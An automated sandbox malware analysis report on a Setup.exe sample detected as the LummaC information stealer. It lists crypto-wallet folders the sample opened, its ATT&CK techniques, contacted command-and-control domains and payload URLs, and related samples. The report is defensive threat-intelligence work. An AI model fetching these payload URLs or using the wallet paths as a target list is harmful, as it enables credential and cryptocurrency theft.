Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: C:\Users\user\Desktop\Setup.exe	Directory queried: C:\Users\user\Documents			Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Directory queried: C:\Users\user\Documents			Jump to behavior

Source: Yara match	File source: 00000000.00000003.1940166955.0000000000E70000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1891443494.0000000000E70000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Setup.exe PID: 7036, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: Setup.exe PID: 7036, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Windows Management Instrumentation	1 DLL Side-Loading	2 Process Injection	121 Virtualization/Sandbox Evasion	2 OS Credential Dumping	1 Query Registry	Remote Services	1 Archive Collected Data	21 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	Boot or Logon Initialization Scripts	1 DLL Side-Loading	2 Process Injection	LSASS Memory	121 Security Software Discovery	Remote Desktop Protocol	31 Data from Local System	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 PowerShell	Logon Script (Windows)	Logon Script (Windows)	11 Deobfuscate/Decode Files or Information	Security Account Manager	121 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	2 Clipboard Data	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	3 Obfuscated Files or Information	NTDS	3 Process Discovery	Distributed Component Object Model	Input Capture	115 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	Steganography	Cached Domain Credentials	1 File and Directory Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	Compile After Delivery	DCSync	22 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Setup.exe	3%	ReversingLabs

Source	Detection	Scanner	Label
https://moanungsnake.click/apie.c	0%	Avira URL Cloud	safe
https://neqi.shop/	100%	Avira URL Cloud	malware
https://moanungsnake.click:443/apimoanungsnake.clickmoanungsnake.click:	0%	Avira URL Cloud	safe
https://kliptizq.shop/int_clp_ldr_sha.txt8	100%	Avira URL Cloud	malware
https://neqi.shop/sdgjyut/psh.txt	100%	Avira URL Cloud	malware
https://www.neptuneutilities.com/resource.html	0%	Avira URL Cloud	safe
https://kliptizq.shop/	100%	Avira URL Cloud	malware
https://moanungsnake.click/6251	0%	Avira URL Cloud	safe
https://moanungsnake.click/apiJ	0%	Avira URL Cloud	safe
https://kliptizq.shop/int_clp_ldr_sha.txtKit/537.36	100%	Avira URL Cloud	malware
https://kliptizq.shop/int_clp_ldr_sha.txtG3	100%	Avira URL Cloud	malware
https://moanungsnake.click/apie.cN	0%	Avira URL Cloud	safe
https://kliptizq.shop/int_clp_ldr_sha.txt	100%	Avira URL Cloud	malware
https://moanungsnake.click/	0%	Avira URL Cloud	safe
https://moanungsnake.click/api	0%	Avira URL Cloud	safe
moanungsnake.click	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
kliptizq.shop	104.21.84.113	true	false	high
neqi.shop	104.21.27.229	true	false	high
moanungsnake.click	104.21.58.45	true	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
curverpluch.lat	false		high
slipperyloo.lat	false		high
tentabatte.lat	false		high
manyrestro.lat	false		high
https://neqi.shop/sdgjyut/psh.txt	false	Avira URL Cloud: malware	unknown
bashfulacid.lat	false		high
wordyfindy.lat	false		high
shapestickyr.lat	false		high
talkynicer.lat	false		high
https://kliptizq.shop/int_clp_ldr_sha.txt	false	Avira URL Cloud: malware	unknown
https://moanungsnake.click/api	true	Avira URL Cloud: safe	unknown
moanungsnake.click	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://moanungsnake.click/6251	Setup.exe, 00000000.00000003.2629810484.0000000000E64000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1963740587.0000000000E59000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.cloudflare.com/learning/access-management/phishing-attack/	Setup.exe, Setup.exe, 00000000.00000002.4129927056.0000000000E7B000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2629810484.0000000000E7E000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2629810484.0000000000E73000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2629486651.0000000003BCE000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2629810484.0000000000E44000.00000004.00000020.00020000.00000000.sdmp	false		high
https://duckduckgo.com/chrome_newtab	Setup.exe, 00000000.00000003.1815860817.0000000003BFB000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1816011341.0000000003BF9000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	Setup.exe, 00000000.00000003.1815860817.0000000003BFB000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1816011341.0000000003BF9000.00000004.00000800.00020000.00000000.sdmp	false		high
https://kliptizq.shop/	Setup.exe, 00000000.00000003.2629810484.0000000000E05000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://moanungsnake.click/apiJ	Setup.exe, 00000000.00000003.2629810484.0000000000E7E000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1940166955.0000000000E70000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.4129927056.0000000000E7E000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1963531213.0000000000E71000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1891443494.0000000000E70000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1916297501.0000000000E7E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://moanungsnake.click/apie.c	Setup.exe, 00000000.00000002.4130135606.0000000000E8D000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2629810484.0000000000E7E000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1963531213.0000000000E87000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://ocsps.ssl.com0?	Setup.exe	false		high
https://contoso.com/License	powershell.exe, 00000004.00000002.2043272348.0000000006335000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.ssl.com/repository/SSLcomRootCertificationAuthorityRSA.crt0	Setup.exe	false		high
http://cert.ssl.com/SSL.com-timeStamping-I-RSA-R1.cer0Q	Setup.exe	false		high
http://ocsps.ssl.com0	Setup.exe	false		high
https://kliptizq.shop/int_clp_ldr_sha.txt8	Setup.exe, 00000000.00000003.2629810484.0000000000E05000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	Setup.exe, 00000000.00000003.1816177740.0000000003BFA000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1815860817.0000000003BFB000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1816011341.0000000003BF9000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crls.ssl.com/SSLcom-RootCA-EV-RSA-4096-R2.crl0	Setup.exe	false		high
http://www.indyproject.org/	Setup.exe	false		high
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17	Setup.exe, 00000000.00000003.1816730650.0000000003C07000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1838854499.0000000003C07000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1839390863.0000000003C07000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1816559634.0000000003C53000.00000004.00000800.00020000.00000000.sdmp	false		high
http://cert.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.cer0_	Setup.exe	false		high
http://go.micros	powershell.exe, 00000004.00000002.2033691829.0000000005426000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crls.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.crl0	Setup.exe	false		high
https://aka.ms/pscore6lB	powershell.exe, 00000004.00000002.2033691829.00000000052D1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://x1.c.lencr.org/0	Setup.exe, 00000000.00000003.1862026466.0000000003BEA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://x1.i.lencr.org/0	Setup.exe, 00000000.00000003.1862026466.0000000003BEA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install	Setup.exe, 00000000.00000003.1816730650.0000000003BE2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	Setup.exe, 00000000.00000003.1816177740.0000000003BFA000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1815860817.0000000003BFB000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1816011341.0000000003BF9000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/	powershell.exe, 00000004.00000002.2043272348.0000000006335000.00000004.00000800.00020000.00000000.sdmp	false		high
https://nuget.org/nuget.exe	powershell.exe, 00000004.00000002.2043272348.0000000006335000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.ssl.com/repository0	Setup.exe	false		high
https://support.mozilla.org/products/firefoxgro.all	Setup.exe, 00000000.00000003.1863102935.0000000003CD4000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000004.00000002.2033691829.00000000052D1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://nuget.org/NuGet.exe	powershell.exe, 00000004.00000002.2043272348.0000000006335000.00000004.00000800.00020000.00000000.sdmp	false		high
https://aka.ms/winsvr-2022-pshelp	powershell.exe, 00000004.00000002.2033691829.0000000005426000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.neptuneutilities.com/resource.html	Setup.exe	false	Avira URL Cloud: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	Setup.exe, 00000000.00000003.1816177740.0000000003BFA000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1815860817.0000000003BFB000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1816011341.0000000003BF9000.00000004.00000800.00020000.00000000.sdmp	false		high
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000004.00000002.2033691829.0000000005426000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 00000004.00000002.2033691829.0000000005426000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000004.00000002.2033691829.0000000005426000.00000004.00000800.00020000.00000000.sdmp	false		high
https://neqi.shop/	Setup.exe, 00000000.00000002.4130135606.0000000000E8D000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2629810484.0000000000E7E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://contoso.com/Icon	powershell.exe, 00000004.00000002.2043272348.0000000006335000.00000004.00000800.00020000.00000000.sdmp	false		high
https://moanungsnake.click:443/apimoanungsnake.clickmoanungsnake.click:	Setup.exe, 00000000.00000003.1940166955.0000000000E87000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	Setup.exe, 00000000.00000003.1815860817.0000000003BFB000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1816011341.0000000003BF9000.00000004.00000800.00020000.00000000.sdmp	false		high
https://kliptizq.shop/int_clp_ldr_sha.txtKit/537.36	Setup.exe, 00000000.00000002.4132372330.000000000341B000.00000004.00000010.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://crl.rootca1.amazontrust.com/rootca1.crl0	Setup.exe, 00000000.00000003.1862026466.0000000003BEA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.microsoft.	powershell.exe, 00000004.00000002.2052362937.0000000008AC2000.00000004.00000020.00020000.00000000.sdmp	false		high
http://ocsp.rootca1.amazontrust.com0:	Setup.exe, 00000000.00000003.1862026466.0000000003BEA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	Setup.exe, 00000000.00000003.1816730650.0000000003C07000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1838854499.0000000003C07000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1839390863.0000000003C07000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1816559634.0000000003C53000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	Setup.exe, 00000000.00000003.1816177740.0000000003BFA000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1815860817.0000000003BFB000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1816011341.0000000003BF9000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	Setup.exe, 00000000.00000003.1863102935.0000000003CD4000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/Pester/Pester	powershell.exe, 00000004.00000002.2033691829.0000000005426000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.cloudflare.com/5xx-error-landing	Setup.exe, Setup.exe, 00000000.00000003.2629810484.0000000000E7E000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2629486651.0000000003BCE000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2629810484.0000000000E44000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ac.ecosia.org/autocomplete?q=	Setup.exe, 00000000.00000003.1816177740.0000000003BFA000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1815860817.0000000003BFB000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1816011341.0000000003BF9000.00000004.00000800.00020000.00000000.sdmp	false		high
https://kliptizq.shop/int_clp_ldr_sha.txtG3	Setup.exe, 00000000.00000003.2629810484.0000000000E05000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://moanungsnake.click/	Setup.exe, 00000000.00000003.1963740587.0000000000E59000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crls.ssl.com/ssl.com-rsa-RootCA.crl0	Setup.exe	false		high
http://crls.ssl.com/SSL.com-timeStamping-I-RSA-R1.crl0	Setup.exe	false		high
https://moanungsnake.click/apie.cN	Setup.exe, 00000000.00000002.4130135606.0000000000E8D000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2629810484.0000000000E7E000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1940166955.0000000000E8D000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1963531213.0000000000E87000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1916297501.0000000000E8D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://support.microsof	Setup.exe, 00000000.00000003.1816559634.0000000003C55000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 00000004.00000002.2033691829.0000000005426000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crt.rootca1.amazontrust.com/rootca1.cer0?	Setup.exe, 00000000.00000003.1862026466.0000000003BEA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples	Setup.exe, 00000000.00000003.1816730650.0000000003BE2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.ssl.com/repository/SSLcom-RootCA-EV-RSA-4096-R2.crt0	Setup.exe	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	Setup.exe, 00000000.00000003.1816177740.0000000003BFA000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1815860817.0000000003BFB000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1816011341.0000000003BF9000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.wisecleaner.net/wisenews/index.php?to=get_news&date=%s	Setup.exe	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
104.21.84.113	kliptizq.shop	United States	13335	CLOUDFLARENETUS	false
104.21.27.229	neqi.shop	United States	13335	CLOUDFLARENETUS	false
104.21.58.45	moanungsnake.click	United States	13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1580119
Start date and time:	2024-12-24 00:42:12 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 30s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	7
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Setup.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@4/5@3/3
EGA Information:	Successful, ratio: 50%
HCA Information:	Successful, ratio: 97% Number of executed functions: 42 Number of non-executed functions: 183
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240s for sample files taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 52.149.20.212, 13.107.246.63
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target powershell.exe, PID 6292 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: Setup.exe

Simulations

Behavior and APIs

Time	Type	Description
18:43:15	API Interceptor	9x Sleep call for process: Setup.exe modified
18:43:37	API Interceptor	14x Sleep call for process: powershell.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.21.84.113	TT4ybwWc1T.exe	Get hash	malicious	LummaC Stealer, zgRAT	Browse	voloknus.pw/api

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
neqi.shop	AutoUpdate.exe	Get hash	malicious	LummaC	Browse	172.67.169.205
	Setup.exe	Get hash	malicious	LummaC	Browse	194.58.112.174
	Setup.exe	Get hash	malicious	LummaC	Browse	194.58.112.174
	Full_Ver_Setup.exe	Get hash	malicious	LummaC	Browse	194.58.112.174
kliptizq.shop	AutoUpdate.exe	Get hash	malicious	LummaC	Browse	172.67.191.144
	Setup.exe	Get hash	malicious	LummaC	Browse	172.67.191.144
	Full_Ver_Setup.exe	Get hash	malicious	LummaC	Browse	104.21.84.113
	setup.exe	Get hash	malicious	LummaC	Browse	104.21.84.113
	Setup.exe	Get hash	malicious	LummaC	Browse	104.21.84.113
	setup.exe	Get hash	malicious	LummaC	Browse	172.67.191.144
	Set-up.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.84.113
	'Setup.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.191.144

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	AutoUpdate.exe	Get hash	malicious	LummaC	Browse	172.67.169.205
	EPIRTURMEROOO0060.exe	Get hash	malicious	MassLogger RAT	Browse	172.67.177.134
	https://en.newsnowbangla.com/archives/69912	Get hash	malicious	HTMLPhisher, TechSupportScam	Browse	104.17.25.14
	https://u48917305.ct.sendgrid.net/ls/click?upn=u001.ztQPJiWtq2gO8V-2Ftd7SxY9UCAq3VScTPSloeIw5UEMPd6e3nbPRvJ98moPTqmrdQ1eNbvwZHJ-2BEb4HrooVFNCTltmXW6SgRONKSmPzdFoWfDQT97cczFZ0vj7M2xBd2izDTi-2BL-2BoVqB8yVzV2GW7vOPvy3s9yVghrOS5vs-2BSnWyzJMkXQxVEReq4oLCDet7QAOvo_JkpSD-2Bg6VoLAQppUKMb-2BxDh4v4nbOeQFT31aoN-2FLkhvFCzY6wdlGM7RTNIi47OKR1tTaghG8tTKssArDNPSXAfX9wO6nsZ2FHn-2FunyaOti-2FaII-2FnbKYDXJOImW-2Bs9f4tYnWj8rqO7L0kp4KNRHBDo0iHoL8DEOGc8GMtzqzsIqERel6-2FxJyY4DBnsnUTOc2I4HCPKA6lxcCEXMtxEA1-2FnQ-3D-3D	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	Proforma Invoice.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.67.152
	Azygoses125.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	104.21.67.152
	HUBED342024.exe	Get hash	malicious	MassLogger RAT	Browse	172.67.177.134
	PARATRANSFARI REMINDER.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.67.152
	https://www.canva.com/design/DAGaHpv1g1M/bVE7B2sT8b8T3P-e2xb64w/view?utm_content=DAGaHpv1g1M&utm_campaign=designshare&utm_medium=link2&utm_source=uniquelinks&utlId=h1ee3678e45	Get hash	malicious	HTMLPhisher	Browse	172.67.74.152
	Violated Heroine_91zbZ-1.exe	Get hash	malicious	Unknown	Browse	104.18.20.226
CLOUDFLARENETUS	AutoUpdate.exe	Get hash	malicious	LummaC	Browse	172.67.169.205
	EPIRTURMEROOO0060.exe	Get hash	malicious	MassLogger RAT	Browse	172.67.177.134
	https://en.newsnowbangla.com/archives/69912	Get hash	malicious	HTMLPhisher, TechSupportScam	Browse	104.17.25.14
	https://u48917305.ct.sendgrid.net/ls/click?upn=u001.ztQPJiWtq2gO8V-2Ftd7SxY9UCAq3VScTPSloeIw5UEMPd6e3nbPRvJ98moPTqmrdQ1eNbvwZHJ-2BEb4HrooVFNCTltmXW6SgRONKSmPzdFoWfDQT97cczFZ0vj7M2xBd2izDTi-2BL-2BoVqB8yVzV2GW7vOPvy3s9yVghrOS5vs-2BSnWyzJMkXQxVEReq4oLCDet7QAOvo_JkpSD-2Bg6VoLAQppUKMb-2BxDh4v4nbOeQFT31aoN-2FLkhvFCzY6wdlGM7RTNIi47OKR1tTaghG8tTKssArDNPSXAfX9wO6nsZ2FHn-2FunyaOti-2FaII-2FnbKYDXJOImW-2Bs9f4tYnWj8rqO7L0kp4KNRHBDo0iHoL8DEOGc8GMtzqzsIqERel6-2FxJyY4DBnsnUTOc2I4HCPKA6lxcCEXMtxEA1-2FnQ-3D-3D	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	Proforma Invoice.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.67.152
	Azygoses125.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	104.21.67.152
	HUBED342024.exe	Get hash	malicious	MassLogger RAT	Browse	172.67.177.134
	PARATRANSFARI REMINDER.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.67.152
	https://www.canva.com/design/DAGaHpv1g1M/bVE7B2sT8b8T3P-e2xb64w/view?utm_content=DAGaHpv1g1M&utm_campaign=designshare&utm_medium=link2&utm_source=uniquelinks&utlId=h1ee3678e45	Get hash	malicious	HTMLPhisher	Browse	172.67.74.152
	Violated Heroine_91zbZ-1.exe	Get hash	malicious	Unknown	Browse	104.18.20.226
CLOUDFLARENETUS	AutoUpdate.exe	Get hash	malicious	LummaC	Browse	172.67.169.205
	EPIRTURMEROOO0060.exe	Get hash	malicious	MassLogger RAT	Browse	172.67.177.134
	https://en.newsnowbangla.com/archives/69912	Get hash	malicious	HTMLPhisher, TechSupportScam	Browse	104.17.25.14
	https://u48917305.ct.sendgrid.net/ls/click?upn=u001.ztQPJiWtq2gO8V-2Ftd7SxY9UCAq3VScTPSloeIw5UEMPd6e3nbPRvJ98moPTqmrdQ1eNbvwZHJ-2BEb4HrooVFNCTltmXW6SgRONKSmPzdFoWfDQT97cczFZ0vj7M2xBd2izDTi-2BL-2BoVqB8yVzV2GW7vOPvy3s9yVghrOS5vs-2BSnWyzJMkXQxVEReq4oLCDet7QAOvo_JkpSD-2Bg6VoLAQppUKMb-2BxDh4v4nbOeQFT31aoN-2FLkhvFCzY6wdlGM7RTNIi47OKR1tTaghG8tTKssArDNPSXAfX9wO6nsZ2FHn-2FunyaOti-2FaII-2FnbKYDXJOImW-2Bs9f4tYnWj8rqO7L0kp4KNRHBDo0iHoL8DEOGc8GMtzqzsIqERel6-2FxJyY4DBnsnUTOc2I4HCPKA6lxcCEXMtxEA1-2FnQ-3D-3D	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	Proforma Invoice.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.67.152
	Azygoses125.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	104.21.67.152
	HUBED342024.exe	Get hash	malicious	MassLogger RAT	Browse	172.67.177.134
	PARATRANSFARI REMINDER.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.67.152
	https://www.canva.com/design/DAGaHpv1g1M/bVE7B2sT8b8T3P-e2xb64w/view?utm_content=DAGaHpv1g1M&utm_campaign=designshare&utm_medium=link2&utm_source=uniquelinks&utlId=h1ee3678e45	Get hash	malicious	HTMLPhisher	Browse	172.67.74.152
	Violated Heroine_91zbZ-1.exe	Get hash	malicious	Unknown	Browse	104.18.20.226

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	AutoUpdate.exe	Get hash	malicious	LummaC	Browse	104.21.27.229 104.21.84.113 104.21.58.45
	Violated Heroine_91zbZ-1.exe	Get hash	malicious	Unknown	Browse	104.21.27.229 104.21.84.113 104.21.58.45
	xlSzrIs5h6.exe	Get hash	malicious	LummaC, Stealc	Browse	104.21.27.229 104.21.84.113 104.21.58.45
	ZysXVT72cl.exe	Get hash	malicious	LummaC	Browse	104.21.27.229 104.21.84.113 104.21.58.45
	NxqDwaYpbp.exe	Get hash	malicious	LummaC	Browse	104.21.27.229 104.21.84.113 104.21.58.45
	NAnOVCOt4L.exe	Get hash	malicious	LummaC	Browse	104.21.27.229 104.21.84.113 104.21.58.45
	2jx1O1t486.exe	Get hash	malicious	LummaC, Stealc	Browse	104.21.27.229 104.21.84.113 104.21.58.45
